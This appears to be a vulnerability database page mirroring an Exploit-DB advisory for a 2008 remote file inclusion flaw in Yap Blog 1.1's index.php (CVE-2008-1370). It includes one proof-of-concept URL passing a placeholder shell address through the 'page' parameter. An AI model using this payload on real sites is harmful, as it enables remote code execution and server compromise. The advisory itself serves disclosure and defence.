Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbTHE_MILLEREDB-ID:31341
HistoryMar 06, 2008 - 12:00 a.m.

Yap Blog 1.1 - 'index.php' Remote File Inclusion

2008-03-0600:00:00
THE_MILLER
www.exploit-db.com
17

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/28120/info

Yap Blog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Versions prior to Yap Blog 1.1.1 are vulnerable. 

http://www.example.com/[path]/index.php?page=[Sh3llAddress]

Related

openvas 2
cve 1
prion 1
nvd 1
cvelist 1
openvas
openvas
Yap Blog < 1.1.1 RFI Vulnerability - Active Check
2009-03-16 00:00:00
Yap Blog 'index.php' Remote File Include Vulnerability
2009-03-16 00:00:00
cve
cve
CVE-2008-1370
2008-03-18 17:44:00
prion
prion
Remote file inclusion
2008-03-18 17:44:00
nvd
nvd
CVE-2008-1370
2008-03-18 17:44:00
cvelist
cvelist
CVE-2008-1370
2008-03-18 17:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:31341
openvas2cve1prion1nvd1cvelist1